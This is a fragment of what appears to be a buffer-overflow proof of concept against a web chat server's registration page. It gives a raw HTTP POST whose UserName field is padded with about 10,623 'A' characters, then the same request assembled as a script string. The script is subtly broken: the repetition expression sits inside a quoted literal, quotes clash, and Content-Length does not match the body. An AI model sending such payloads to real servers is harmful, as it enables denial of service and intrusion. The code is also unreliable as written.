POST /registresult.htm HTTP/1.1\r\n
Host: 192.168.100.120\r\n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Referer: http://192.168.100.120/register.ghp\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 184\r\n
Connection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n
UserName="A" * 10623
&Password=trune&Password1=trune&Sex=1&Email=tune%40gmail.com&Icon=0.gif&Resume=we&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register&'



req  = "POST /registresult.htm HTTP/1.1\r\n"
req += "Host: 192.168.100.120\r\n"
req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "Accept-Language: en-US,en;q=0.5\r\n"
req += "Accept-Encoding: gzip, deflate\r\n"
req += "Referer: http://192.168.100.120/register.ghp\r\n"
req += "Content-Type: application/x-www-form-urlencoded\r\n"
req += "Content-Length: 184\r\n"
req += "Connection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
req += "UserName="A" * 10623"
req += "&Password=trune&Password1=trune&Sex=1&Email=tune%40gmail.com&Icon=0.gif&Resume=we&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register&'"
